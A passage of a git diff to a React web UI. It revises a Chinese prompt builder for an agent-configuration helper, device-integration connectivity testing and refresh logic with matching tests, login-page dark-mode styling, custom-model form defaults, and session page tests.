+      : `如果用户希望改动 Agent 文件或重新生成 prompt.md/agent.yaml，请先加载并遵守项目内 .flocks/plugins/skills/agent-builder（agent-builder skill）。`,
     ``,
     `**当前配置状态：**`,
     `- 名称：${formData.name || '（未填写）'}`,
     `- 描述（英文）：${formData.description || '（未填写）'}`,
     `- 描述（中文）：${formData.descriptionCn || '（未填写）'}`,
     `- System Prompt：${promptPreview || '（未填写）'}`,
+    `- 模型：${modelSummary}`,
     `- 温度：${formData.temperature}`,
     `- 模式：${formData.mode === 'primary' ? 'Primary（主 Agent）' : 'Subagent（子 Agent）'}`,
+    `- Tools：${toolsSummary}`,
+    `- Skills：${skillsSummary}`,
+    `- 是否内置 Agent：${isNative ? '是。内置 Agent 仅支持修改模型和温度，其他配置由系统维护。' : '否，可修改描述、Prompt、温度、Tools 和 Skills。'}`,
     ``,
-    `**Agent 字段说明：**`,
-    `- **名称**：小写字母、数字和连字符，是 Agent 的唯一标识符`,
-    `- **描述**：简短说明 Agent 的用途（30字以内）`,
-    `- **System Prompt**：Agent 的核心指令，决定其行为、能力和风格`,
-    `- **温度**：0-2，值越低越精准保守（安全分析推荐 0.2-0.5），越高越有创意`,
-    `- **模式**：primary 直接与用户交互；subagent 由主 Agent 调用`,
+    `**编辑流程：**`,
+    `1. 先确认用户想解决的问题：职责变更、行为风格、工具权限、输出格式或模型参数。`,
+    `2. 对照当前配置说明建议修改哪些字段，并指出不建议修改的边界。`,
+    `3. 必要时一次只问一个关键问题，避免一开始就输出大段配置。`,
+    `4. 用户确认后，输出可被「从 Rex 提取配置」解析的 JSON 配置摘要。`,
     ``,
-    `请根据用户的描述帮助他们修改 Agent 配置。`,
-    `配置完成后，用户可以点击「从 Rex 提取配置」按钮，将配置自动填入表单。`,
-    `届时你会被要求以 JSON 格式输出配置摘要，请确保 JSON 格式正确。`,
+    ...editableFieldLines,
+    ``,
+    `配置完成后，用户会点击引导按钮「从 Rex 提取配置」，将配置自动填入表单。届时你会被要求只输出 JSON，请确保 JSON 格式正确。`,
   ].join('\n');
 }
 
-function buildRexWelcome(isEdit: boolean, agentName?: string): string {
+function buildRexWelcome(isEdit: boolean, agentName?: string, isNative = false): string {
   if (isEdit) {
+    if (isNative) {
+      return `你好！我来帮你修改内置 Agent **${agentName}** 的可保存配置。
+
+你可以从下方选择一个编辑入口，也可以直接描述你想调整的地方，比如：
+
+- 检查当前模型是否适合这个 Agent
+- 调低温度，让输出更稳定保守
+- 设计测试输入和验收标准
+
+注意：这是内置 Agent，当前只支持保存模型和温度。`;
+    }
+
     return `你好！我来帮你修改 Agent **${agentName}** 的配置。
 
-你可以告诉我：
-- 想调整 System Prompt 的哪些部分？
-- 需要改变 Agent 的行为风格？
-- 温度或其他参数需要调整？
+你可以从下方选择一个编辑入口，也可以直接描述你想改的地方，比如：
+
+- 调整职责边界或委派触发条件
+- 优化 System Prompt 和输出格式
+- 收敛工具 / Skill 权限
+- 调整温度并验证效果
 
-描述你的需求，我来帮你完善配置。配置好后，点击底部「从 Rex 提取配置」即可自动填入表单。`;
+配置好后，点击引导按钮「从 Rex 提取配置」即可自动填入表单。`;
   }
   return `你好！我来帮你创建一个新的子 Agent。
 
@@ -789,3 +899,28 @@ function parseJsonFromText(text: string): Record<string, any> | null {
 
   return null;
 }
+
+function getModelKeyFromConfig(config: Record<string, any>, fallback: string): string {
+  if (typeof config.modelKey === 'string' && config.modelKey.includes('::')) {
+    return config.modelKey;
+  }
+
+  const model = config.model;
+  if (!model || typeof model !== 'object') {
+    return fallback;
+  }
+
+  const raw = model as Record<string, unknown>;
+  const providerID = typeof raw.providerID === 'string'
+    ? raw.providerID
+    : typeof raw.provider_id === 'string'
+      ? raw.provider_id
+      : '';
+  const modelID = typeof raw.modelID === 'string'
+    ? raw.modelID
+    : typeof raw.model_id === 'string'
+      ? raw.model_id
+      : '';
+
+  return providerID && modelID ? `${providerID}::${modelID}` : fallback;
+}
diff --git a/webui/src/pages/Channel/index.tsx b/webui/src/pages/Channel/index.tsx
index 51e61baf2..963a16693 100644
--- a/webui/src/pages/Channel/index.tsx
+++ b/webui/src/pages/Channel/index.tsx
@@ -1142,7 +1142,7 @@ function DingTalkPanel({ config, onChange }: DingTalkPanelProps) {
           <TextInput
             value={config.clientId ?? ''}
             onChange={(v) => set('clientId', v || undefined)}
-            placeholder="dingtalk_xxxxxxxxxxxxxxxxxx"
+            placeholder="dingxxxxxxxxxxxxxxxx"
           />
         </FieldRow>
         <FieldRow label="Client Secret" required hint={t('dingtalk.clientSecretHint')}>
diff --git a/webui/src/pages/DeviceIntegration/index.test.tsx b/webui/src/pages/DeviceIntegration/index.test.tsx
index e6c6af4b7..6e1c4338d 100644
--- a/webui/src/pages/DeviceIntegration/index.test.tsx
+++ b/webui/src/pages/DeviceIntegration/index.test.tsx
@@ -15,6 +15,7 @@ const mocks = vi.hoisted(() => ({
   sessionId: null as string | null,
   resetSession: vi.fn(),
   listDevices: vi.fn(),
+  syncDevices: vi.fn(),
   getDevice: vi.fn(),
   listGroups: vi.fn(),
   createGroup: vi.fn(),
@@ -52,6 +53,7 @@ vi.mock('react-i18next', () => ({
         'config.roomLabel': '所属机房',
         'config.saveBtn': '保存配置',
         'config.addBtn': '添加设备',
+        'config.testBtn': '连通测试',
         'config.showSecretAction': '显示',
         'config.hideSecretAction': '隐藏',
         'wizard.selectVendorTitle': `选择 ${String(params?.vendor ?? '')} 设备`,
@@ -160,6 +162,7 @@ vi.mock('@/hooks/useSessionChat', () => ({
 vi.mock('@/api/device', () => ({
   deviceAPI: {
     list: (...args: unknown[]) => mocks.listDevices(...args),
+    sync: (...args: unknown[]) => mocks.syncDevices(...args),
     get: (...args: unknown[]) => mocks.getDevice(...args),
     revealCredentials: (...args: unknown[]) => mocks.revealDeviceCredentials(...args),
     listGroups: (...args: unknown[]) => mocks.listGroups(...args),
@@ -211,6 +214,7 @@ describe('DeviceIntegrationPage', () => {
     vi.clearAllMocks();
     mocks.sessionId = null;
     mocks.listDevices.mockResolvedValue({ data: [] });
+    mocks.syncDevices.mockResolvedValue({ data: { created: 0 } });
     mocks.getDevice.mockResolvedValue({
       data: {
         id: 'device-1',
@@ -227,6 +231,9 @@ describe('DeviceIntegrationPage', () => {
         updated_at: 0,
       },
     });
+    mocks.testDevice.mockResolvedValue({
+      data: { success: true, message: 'HTTP 200, 163ms', latency_ms: 163 },
+    });
     mocks.listGroups.mockResolvedValue({
       data: [{ id: 'default', name: '默认机房', sort_order: 0, created_at: 0, updated_at: 0 }],
     });
@@ -240,6 +247,27 @@ describe('DeviceIntegrationPage', () => {
     mocks.refreshTools.mockResolvedValue({ data: { ok: true } });
   });
 
+  it('refreshes devices and templates without syncing when the window regains focus', async () => {
+    render(<DeviceIntegrationPage />);
+
+    await screen.findByText('设备接入');
+    await waitFor(() => {
+      expect(mocks.listDevices).toHaveBeenCalledTimes(1);
+    });
+    mocks.listDevices.mockClear();
+    mocks.listTemplates.mockClear();
+    mocks.listGroups.mockClear();
+
+    window.dispatchEvent(new Event('focus'));
+
+    await waitFor(() => {
+      expect(mocks.listDevices).toHaveBeenCalledWith();
+      expect(mocks.listTemplates).toHaveBeenCalledWith();
+      expect(mocks.listGroups).toHaveBeenCalled();
+    });
+    expect(mocks.syncDevices).not.toHaveBeenCalled();
+  });
+
   it('shows custom device option and access modes', async () => {
     const user = userEvent.setup();
     render(<DeviceIntegrationPage />);
@@ -544,6 +572,109 @@ describe('DeviceIntegrationPage', () => {
     });
   });
 
+  it('tests connectivity with draft fields without replacing the form', async () => {
+    const user = userEvent.setup();
+    const initialDevice = {
+      id: 'device-1',
+      group_id: 'group-1',
+      name: 'onesig-02',
+      storage_key: 'onesig_api_v2_5_3',
+      service_id: 'onesig_api',
+      enabled: true,
+      verify_ssl: false,
+      fields: {
+        base_url: 'https://persisted.example.com',
+        api_prefix: '/api',
+        username: 'admin',
+        password: 'p***word',
+      },
+      fields_set: { base_url: true, api_prefix: true, username: true, password: true },
+      status: 'connected',
+      created_at: 0,
+      updated_at: 0,
+    };
+    mocks.listDevices.mockResolvedValue({ data: [initialDevice] });
+    mocks.listTemplates.mockResolvedValue({
+      data: [
+        buildTemplate({
+          plugin_id: 'onesig_v2_5_3',
+          storage_key: 'onesig_api_v2_5_3',
+          service_id: 'onesig_api',
+          name: 'OneSIG',
+          vendor: 'threatbook',
+        }),
+      ],
+    });
+    mocks.getServiceMetadata.mockResolvedValueOnce({
+      data: {
+        name: 'OneSIG',
+        credential_schema: [
+          {
+            key: 'base_url',
+            label: 'Base URL',
+            storage: 'config',
+            sensitive: false,
+            required: true,
+            input_type: 'url',
+            config_key: 'base_url',
+          },
+          {
+            key: 'api_prefix',
+            label: 'API Prefix',
+            storage: 'config',
+            sensitive: false,
+            required: false,
+            input_type: 'text',
+            config_key: 'api_prefix',
+          },
+          {
+            key: 'username',
+            label: 'Username',
+            storage: 'config',
+            sensitive: false,
+            required: true,
+            input_type: 'text',
+            config_key: 'username',
+          },
+          {
+            key: 'password',
+            label: 'Password',
+            storage: 'secret',
+            sensitive: true,
+            required: true,
+            input_type: 'password',
+            config_key: 'password',
+          },
+        ],
+      },
+    });
+
+    render(<DeviceIntegrationPage />);
+
+    await user.click(await screen.findByText('onesig-02'));
+    const baseUrl = await screen.findByDisplayValue('https://persisted.example.com');
+    await user.clear(baseUrl);
+    await user.type(baseUrl, 'https://draft.example.com');
+    await user.click(screen.getByRole('button', { name: /连通测试/ }));
+
+    await waitFor(() => {
+      expect(mocks.testDevice).toHaveBeenCalledWith('device-1', {
+        fields: expect.objectContaining({
+          base_url: 'https://draft.example.com',
+          api_prefix: '/api',
+          username: 'admin',
+          password: 'p***word',
+        }),
+        verify_ssl: false,
+        base_url: 'https://draft.example.com',
+      });
+    });
+    expect(mocks.getDevice).not.toHaveBeenCalled();
+    expect(mocks.listDevices).toHaveBeenCalledTimes(1);
+    expect(screen.getByDisplayValue('https://draft.example.com')).toBeInTheDocument();
+    expect(await screen.findByText('HTTP 200, 163ms')).toBeInTheDocument();
+  });
+
   it('reveals the full persisted secret when clicking show', async () => {
     const user = userEvent.setup();
     mocks.listDevices.mockResolvedValueOnce({
diff --git a/webui/src/pages/DeviceIntegration/index.tsx b/webui/src/pages/DeviceIntegration/index.tsx
index e90528148..2cf7203b2 100644
--- a/webui/src/pages/DeviceIntegration/index.tsx
+++ b/webui/src/pages/DeviceIntegration/index.tsx
@@ -451,7 +451,7 @@ function Toggle({ on, onToggle }: { on: boolean; onToggle: () => void }) {
 
 function DeviceConfigPanel({
   device, template, vendorKey, initialGroupId, groups, groupLocked,
-  onSave, onDelete, onClose, onTest, onToggleVerifySsl, onToggleEnabled, onBack,
+  onSave, onDelete, onClose, onTest, onBack,
 }: {
   device?: DeviceIntegration;
   template?: DeviceTemplate;
@@ -469,9 +469,7 @@ function DeviceConfigPanel({
   }) => Promise<void>;
   onDelete?: () => Promise<void>;
   onClose: () => void;
-  onTest?: (overrides: { verify_ssl: boolean; base_url?: string }) => Promise<{ success: boolean; message: string }>;
-  onToggleVerifySsl?: (next: boolean) => Promise<void>;
-  onToggleEnabled?: (next: boolean) => Promise<void>;
+  onTest?: (overrides: { fields: Record<string, string>; verify_ssl: boolean; base_url?: string }) => Promise<{ success: boolean; message: string }>;
   onBack?: () => void;
 }) {
   const toast = useToast();
@@ -495,6 +493,7 @@ function DeviceConfigPanel({
   const [metadata, setMetadata] = useState<{ name?: string; version?: string; description?: string; description_cn?: string; docs_url?: string } | null>(null);
   const [toolEnabled, setToolEnabled] = useState<Record<string, boolean>>({});
   const originalMasked = useRef<Record<string, string>>({});
+  const dirtyRef = useRef(false);
 
   const serviceId = device?.service_id ?? template?.service_id ?? '';
   const storageKey = device?.storage_key ?? template?.storage_key ?? '';
@@ -530,7 +529,9 @@ function DeviceConfigPanel({
             }
           });
           originalMasked.current = masked;
-          setFields({ ...device.fields });
+          if (!dirtyRef.current) {
+            setFields({ ...device.fields });
+          }
         } else {
           const defaults: Record<string, string> = {};
           schema.forEach((f) => { if (f.default_value) defaults[f.key] = f.default_value; });
@@ -570,6 +571,7 @@ function DeviceConfigPanel({
         if (payload[k] === masked) payload[k] = '';
       });
       await onSave({ name: name.trim(), fields: payload, enabled, verify_ssl: verifySsl, group_id: groupId });
+      dirtyRef.current = false;
       toast.success(device ? t('toast.saveDone') : t('toast.addDone'));
     } catch {
       toast.error(t('toast.saveFailed'));
@@ -594,6 +596,7 @@ function DeviceConfigPanel({
         }
       }
       setTestResult(await onTest({
+        fields,
         verify_ssl: verifySsl,
         base_url: candidateBaseUrl || undefined,
       }));
@@ -602,30 +605,16 @@ function DeviceConfigPanel({
     }
   };
 
-  const handleToggleSsl = async () => {
+  const handleToggleSsl = () => {
     const next = !verifySsl;
+    dirtyRef.current = true;
     setVerifySsl(next);
-    if (!device || !onToggleVerifySsl) return;
-    try {
-      await onToggleVerifySsl(next);
-      toast.success(next ? t('toast.sslOn') : t('toast.sslOff'));
-    } catch {
-      setVerifySsl(!next);
-      toast.error(t('toast.rollback'));
-    }
   };
 
-  const handleToggleEnabled = async () => {
+  const handleToggleEnabled = () => {
     const next = !enabled;
+    dirtyRef.current = true;
     setEnabled(next);
-    if (!device || !onToggleEnabled) return;
-    try {
-      await onToggleEnabled(next);
-      toast.success(next ? t('toast.enabledOn') : t('toast.enabledOff'));
-    } catch {
-      setEnabled(!next);
-      toast.error(t('toast.rollback'));
-    }
   };
 
   const handleToggleFieldVisibility = async (field: APIServiceCredentialField, hasExisting: boolean) => {
@@ -759,7 +748,10 @@ function DeviceConfigPanel({
                   <input
                     type="text"
                     value={name}
-                    onChange={(e) => setName(e.target.value)}
+                    onChange={(e) => {
+                      dirtyRef.current = true;
+                      setName(e.target.value);
+                    }}
                     placeholder={t('config.namePlaceholder')}
                     className="w-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-sm text-zinc-900 focus:border-blue-300 focus:outline-none focus:ring-2 focus:ring-blue-100"
                   />
@@ -779,7 +771,10 @@ function DeviceConfigPanel({
                   ) : (
                     <select
                       value={groupId}
-                      onChange={(e) => setGroupId(e.target.value)}
+                      onChange={(e) => {
+                        dirtyRef.current = true;
+                        setGroupId(e.target.value);
+                      }}
                       className="w-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-sm text-zinc-900 focus:border-blue-300 focus:outline-none focus:ring-2 focus:ring-blue-100"
                     >
                       {groups.map((g) => (
@@ -807,7 +802,10 @@ function DeviceConfigPanel({
                             <input
                               type={isSecret && !show ? 'password' : 'text'}
                               value={fields[f.key] ?? ''}
-                              onChange={(e) => setFields((p) => ({ ...p, [f.key]: e.target.value }))}
+                              onChange={(e) => {
+                                dirtyRef.current = true;
+                                setFields((p) => ({ ...p, [f.key]: e.target.value }));
+                              }}
                               placeholder={f.default_value ?? ''}
                               className="w-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-sm text-zinc-900 focus:border-blue-300 focus:outline-none focus:ring-2 focus:ring-blue-100 pr-10"
                             />
@@ -1215,8 +1213,8 @@ function GroupSidebar({ groups, devices, selectedGroupId, onSelect, onRename, on
 
                   {/* Hover action buttons */}
                   <div
-                    className="absolute right-1 inset-y-0 hidden group-hover/room:flex items-center gap-0.5 pl-4"
-                    style={{ background: `linear-gradient(to right, transparent, ${isSelected ? '#eff6ff' : '#f4f4f5'} 35%)` }}
+                    className="device-room-actions-fade absolute right-1 inset-y-0 hidden group-hover/room:flex items-center gap-0.5 pl-4"
+                    data-selected={isSelected ? 'true' : 'false'}
                   >
                     <button
                       onClick={(e) => startEdit(group, e)}
@@ -1302,6 +1300,7 @@ export default function DeviceIntegrationPage() {
   const [loading, setLoading] = useState(true);
   const [refreshing, setRefreshing] = useState(false);
   const [panel, setPanel] = useState<PanelMode>(null);
+  const lastRefreshRef = useRef(0);
   // null = "全部机房" aggregate view; string = specific group id
   const [selectedGroupId, setSelectedGroupId] = useState<string | null>(null);
   // Group ids whose section is collapsed in the "全部机房" view. Default
@@ -1332,9 +1331,12 @@ export default function DeviceIntegrationPage() {
     if (!silent) setLoading(true);
     else setRefreshing(true);
     try {
+      if (refreshTemplates) {
+        await deviceAPI.sync({ refresh: true });
+      }
       const [devRes, tplRes, grpRes] = await Promise.all([
-        deviceAPI.list(refreshTemplates ? { refresh: true } : undefined),
-        deviceAPI.listTemplates(refreshTemplates ? { refresh: true } : undefined),
+        deviceAPI.list(),
+        deviceAPI.listTemplates(),
         deviceAPI.listGroups(),
       ]);
       const nextTemplates = tplRes.data || [];
@@ -1353,6 +1355,31 @@ export default function DeviceIntegrationPage() {
 
   useEffect(() => { void fetchData(); }, [fetchData]);
 
+  const refreshOnResume = useCallback(() => {
+    const now = Date.now();
+    if (now - lastRefreshRef.current < 1000) return;
+    lastRefreshRef.current = now;
+    void fetchData(true);
+  }, [fetchData]);
+
+  useEffect(() => {
+    const handleVisibilityChange = () => {
+      if (document.visibilityState === 'visible') {
+        refreshOnResume();
+      }
+    };
+    const handleWindowFocus = () => {
+      refreshOnResume();
+    };
+
+    document.addEventListener('visibilitychange', handleVisibilityChange);
+    window.addEventListener('focus', handleWindowFocus);
+    return () => {
+      document.removeEventListener('visibilitychange', handleVisibilityChange);
+      window.removeEventListener('focus', handleWindowFocus);
+    };
+  }, [refreshOnResume]);
+
   // Count instances per storage_key (for wizard display)
   const instanceCounts = useMemo(() => {
     const counts: Record<string, number> = {};
@@ -1468,33 +1495,23 @@ export default function DeviceIntegrationPage() {
     await fetchData(true);
   };
 
-  const handleTest = async (overrides: { verify_ssl: boolean; base_url?: string }) => {
+  const handleTest = async (overrides: { fields: Record<string, string>; verify_ssl: boolean; base_url?: string }) => {
     if (panel?.kind !== 'edit') return { success: false, message: '' };
     const res = await deviceAPI.test(panel.device.id, overrides);
-    await fetchData(true);
-    if (panel?.kind === 'edit') {
-      const updated = await deviceAPI.get(panel.device.id);
-      setPanel({ kind: 'edit', device: updated.data });
-    }
+    setDevices((current) => current.map((device) => (
+      device.id === panel.device.id
+        ? {
+            ...device,
+            status: res.data.success ? 'ok' : 'error',
+            message: res.data.message,
+            latency_ms: res.data.latency_ms ?? null,
+            checked_at: Date.now(),
+          }
+        : device
+    )));
     return res.data;
   };
 
-  const handleToggleVerifySsl = async (next: boolean) => {
-    if (panel?.kind !== 'edit') return;
-    await deviceAPI.update(panel.device.id, { verify_ssl: next });
-    const updated = await deviceAPI.get(panel.device.id);
-    setPanel({ kind: 'edit', device: updated.data });
-    await fetchData(true);
-  };
-
-  const handleToggleEnabled = async (next: boolean) => {
-    if (panel?.kind !== 'edit') return;
-    await deviceAPI.update(panel.device.id, { enabled: next });
-    const updated = await deviceAPI.get(panel.device.id);
-    setPanel({ kind: 'edit', device: updated.data });
-    await fetchData(true);
-  };
-
   // ──────────────────────────────────────────────────────────────────────────
   // Group to use when adding a new device (follows sidebar selection).
   // In "全部机房" view (null), pre-select the first available group so the
@@ -1818,8 +1835,6 @@ export default function DeviceIntegrationPage() {
             onDelete={panel.kind === 'edit' ? handleDelete : undefined}
             onClose={() => setPanel(null)}
             onTest={panel.kind === 'edit' ? handleTest : undefined}
-            onToggleVerifySsl={panel.kind === 'edit' ? handleToggleVerifySsl : undefined}
-            onToggleEnabled={panel.kind === 'edit' ? handleToggleEnabled : undefined}
             onBack={panel.kind === 'add'
               ? () => setPanel({
                   kind: 'wizard',
diff --git a/webui/src/pages/Login/index.tsx b/webui/src/pages/Login/index.tsx
index a809d29ef..652fc9b5a 100644
--- a/webui/src/pages/Login/index.tsx
+++ b/webui/src/pages/Login/index.tsx
@@ -34,25 +34,25 @@ export default function LoginPage() {
     <AuthLayout>
       <form
         onSubmit={onSubmit}
-        className="w-full max-w-md bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4"
+        className="w-full max-w-md bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4 dark:border-[#4a5563] dark:bg-[#303842] dark:shadow-xl dark:shadow-black/20"
       >
         <div>
-          <h1 className="text-xl font-semibold text-gray-900">{t('login.title')}</h1>
-          <p className="text-sm text-gray-500 mt-1">{t('login.description')}</p>
+          <h1 className="text-xl font-semibold text-gray-900 dark:text-[#d7dee8]">{t('login.title')}</h1>
+          <p className="text-sm text-gray-500 mt-1 dark:text-[#b8c2cc]">{t('login.description')}</p>
         </div>
         <div>
-          <label className="text-sm text-gray-700 block mb-1">{t('fields.username')}</label>
+          <label className="text-sm text-gray-700 block mb-1 dark:text-[#d7dee8]">{t('fields.username')}</label>
           <input
             value={username}
             onChange={(e) => setUsername(e.target.value)}
-            className="w-full border border-gray-300 rounded-lg px-3 py-2 outline-none focus:border-blue-500"
+            className="w-full border border-gray-300 rounded-lg px-3 py-2 outline-none focus:border-blue-500 dark:border-[#4a5563] dark:bg-[#252c35] dark:text-[#d7dee8] dark:placeholder:text-[#9aa7b4] dark:focus:border-[#539bf5]"
             placeholder={t('fields.usernamePlaceholder')}
             autoComplete="username"
             required
           />
         </div>
         <div>
-          <label className="text-sm text-gray-700 block mb-1">{t('fields.password')}</label>
+          <label className="text-sm text-gray-700 block mb-1 dark:text-[#d7dee8]">{t('fields.password')}</label>
           <PasswordInput
             value={password}
             onChange={(e) => setPassword(e.target.value)}
@@ -62,27 +62,27 @@ export default function LoginPage() {
           />
         </div>
         {error && (
-          <div className="text-sm text-red-600 bg-red-50 border border-red-200 rounded-lg px-3 py-2">
+          <div className="text-sm text-red-600 bg-red-50 border border-red-200 rounded-lg px-3 py-2 dark:border-red-400/30 dark:bg-red-500/15 dark:text-red-200">
             {error}
           </div>
         )}
         <button
           type="submit"
           disabled={submitting}
-          className="w-full bg-slate-900 text-white rounded-lg py-2.5 font-medium hover:bg-slate-800 disabled:opacity-60"
+          className="w-full bg-slate-900 text-white rounded-lg py-2.5 font-medium hover:bg-slate-800 disabled:opacity-60 dark:bg-[#46515e] dark:hover:bg-[#5a6573]"
         >
           {submitting ? t('actions.loggingIn') : t('actions.login')}
         </button>
-        <div className="space-y-2 text-xs text-gray-500 border-t border-gray-100 pt-3">
+        <div className="space-y-2 text-xs text-gray-500 border-t border-gray-100 pt-3 dark:border-[#4a5563] dark:text-[#b8c2cc]">
           <div>
             {t('login.recoverUsername')}
             {' '}
-            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700">flocks admin list-users</code>
+            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700 dark:bg-[#46515e] dark:text-[#d7dee8]">flocks admin list-users</code>
           </div>
           <div>
             {t('login.recoverPassword')}
             {' '}
-            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700">flocks admin generate-one-time-password --username admin</code>
+            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700 dark:bg-[#46515e] dark:text-[#d7dee8]">flocks admin generate-one-time-password --username admin</code>
           </div>
         </div>
       </form>
diff --git a/webui/src/pages/Model/index.tsx b/webui/src/pages/Model/index.tsx
index d74b865bc..8175777a6 100644
--- a/webui/src/pages/Model/index.tsx
+++ b/webui/src/pages/Model/index.tsx
@@ -31,6 +31,7 @@ import {
 import type {
   ProviderCredentials, ModelDefinitionV2, UsageStats,
   CatalogProvider, CatalogModel, CatalogCredentialField, ModelSettingV2,
+  CustomModelCreate,
 } from '@/types';
 
 // ==================== Provider Auth Helpers ====================
@@ -1828,8 +1829,8 @@ function CatalogModelBadges({ model }: { model: CatalogModel }) {
 function useModelForm() {
   const [modelId, setModelId] = useState('');
   const [name, setName] = useState('');
-  const [contextWindow, setContextWindow] = useState('128000');
-  const [maxOutput, setMaxOutput] = useState('128000');
+  const [contextWindow, setContextWindow] = useState('');
+  const [maxOutput, setMaxOutput] = useState('');
   const [supportsVision, setSupportsVision] = useState(false);
   const [supportsTools, setSupportsTools] = useState(true);
   const [supportsStreaming, setSupportsStreaming] = useState(true);
@@ -1840,25 +1841,34 @@ function useModelForm() {
 
   const reset = useCallback(() => {
     setModelId(''); setName('');
-    setContextWindow('128000'); setMaxOutput('128000');
+    setContextWindow(''); setMaxOutput('');
     setSupportsVision(false); setSupportsTools(true);
     setSupportsStreaming(true); setSupportsReasoning(true);
     setInputPrice('0'); setOutputPrice('0'); setCurrency('USD');
   }, []);
 
-  const toPayload = useCallback(() => ({
-    model_id: modelId.trim(),
-    name: name.trim(),
-    context_window: parseInt(contextWindow) || 128000,
-    max_output_tokens: parseInt(maxOutput) || 4096,
-    supports_vision: supportsVision,
-    supports_tools: supportsTools,
-    supports_streaming: supportsStreaming,
-    supports_reasoning: supportsReasoning,
-    input_price: parseFloat(inputPrice) || 0,
-    output_price: parseFloat(outputPrice) || 0,
-    currency,
-  }), [modelId, name, contextWindow, maxOutput, supportsVision, supportsTools, supportsStreaming, supportsReasoning, inputPrice, outputPrice, currency]);
+  const toPayload = useCallback(() => {
+    const payload: CustomModelCreate = {
+      model_id: modelId.trim(),
+      name: name.trim(),
+      supports_vision: supportsVision,
+      supports_tools: supportsTools,
+      supports_streaming: supportsStreaming,
+      supports_reasoning: supportsReasoning,
+      input_price: parseFloat(inputPrice) || 0,
+      output_price: parseFloat(outputPrice) || 0,
+      currency,
+    };
+    const parsedContextWindow = parseInt(contextWindow);
+    if (Number.isFinite(parsedContextWindow) && parsedContextWindow > 0) {
+      payload.context_window = parsedContextWindow;
+    }
+    const parsedMaxOutput = parseInt(maxOutput);
+    if (Number.isFinite(parsedMaxOutput) && parsedMaxOutput > 0) {
+      payload.max_output_tokens = parsedMaxOutput;
+    }
+    return payload;
+  }, [modelId, name, contextWindow, maxOutput, supportsVision, supportsTools, supportsStreaming, supportsReasoning, inputPrice, outputPrice, currency]);
 
   const isValid = modelId.trim() !== '' && name.trim() !== '';
 
@@ -1893,7 +1903,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.modelId}
             onChange={e => form.setModelId(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
-            placeholder={modelIdPlaceholder || 'gpt-4o-custom'}
+            placeholder={modelIdPlaceholder || 'model-id'}
           />
           {modelIdHint && <p className="mt-1 text-xs text-gray-500">{modelIdHint}</p>}
         </div>
@@ -1906,7 +1916,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.name}
             onChange={e => form.setName(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
-            placeholder="GPT-4o Custom"
+            placeholder="model-name"
           />
         </div>
       </div>
@@ -1919,6 +1929,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.contextWindow}
             onChange={e => form.setContextWindow(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
+            placeholder="Auto"
           />
         </div>
         <div>
@@ -1928,6 +1939,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.maxOutput}
             onChange={e => form.setMaxOutput(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
+            placeholder="Auto"
           />
         </div>
       </div>
diff --git a/webui/src/pages/Session/index.test.tsx b/webui/src/pages/Session/index.test.tsx
index 0a90ba5ef..0c6703358 100644
--- a/webui/src/pages/Session/index.test.tsx
+++ b/webui/src/pages/Session/index.test.tsx
@@ -93,24 +93,37 @@ vi.mock('@/components/common/SessionChat', () => ({
     toolbarSlot,
     centerToolbarSlot,
     onCreateAndSend,
+    agentName,
     model,
+    display,
   }: {
     sessionId?: string | null;
+    agentName?: string;
     mentionAgents?: Array<{ name: string }>;
     toolbarSlot?: React.ReactNode;
     centerToolbarSlot?: React.ReactNode;
     model?: { providerID: string; modelID: string } | null;
+    display?: {
+      compact?: boolean;
+      showActions?: boolean;
+      showTimestamp?: boolean;
+      collapseIntermediateSteps?: boolean;
+      processGroupsDefaultOpen?: boolean;
+    };
     onCreateAndSend?: (text: string, imageParts?: unknown[], agentOverride?: string) => Promise<unknown> | unknown;
   }) => (
     <div
       data-testid="session-chat"
+      data-agent-name={agentName ?? ''}
       data-mention-agents={(mentionAgents ?? []).map((a) => a.name).join(',')}
       data-model={model ? `${model.providerID}/${model.modelID}` : ''}
+      data-collapse-intermediate={String(Boolean(display?.collapseIntermediateSteps))}
+      data-process-groups-default-open={String(Boolean(display?.processGroupsDefaultOpen))}
     >
       {sessionId ?? 'no-session'}
       {toolbarSlot}
       {centerToolbarSlot}
-      <button type="button" onClick={() => void onCreateAndSend?.('hello from empty session')}>
+      <button type="button" onClick={() => void onCreateAndSend?.('hello from empty session', [], agentName)}>
         mock-create-and-send
       </button>
     </div>
@@ -120,6 +133,12 @@ vi.mock('@/components/common/SessionChat', () => ({
 vi.mock('@/utils/agentDisplay', () => ({
   getAgentDisplayDescription: () => 'agent-description',
   getAgentDisplayName: (agent: { name: string }) => agent.name.charAt(0).toUpperCase() + agent.name.slice(1),
+  isAgentUsableInChat: (agent: { mode?: string; hidden?: boolean; delegatable?: boolean; tags?: string[] }) => (
+    Boolean(agent)
+    && !agent.hidden
+    && !(agent.tags ?? []).includes('system')
+    && (agent.mode === 'primary' || agent.delegatable !== false)
+  ),
 }));
 
 vi.mock('@/utils/time', () => ({
@@ -373,6 +392,15 @@ describe('SessionPage session actions menu', () => {
     expect(screen.getByTestId('session-chat')).toHaveTextContent('session-1');
   });
 
+  it('defaults session process groups open on the session management page', () => {
+    localStorage.setItem('flocks:last-selected-session', 'session-1');
+
+    renderSessionPage();
+
+    expect(screen.getByTestId('session-chat')).toHaveAttribute('data-collapse-intermediate', 'true');
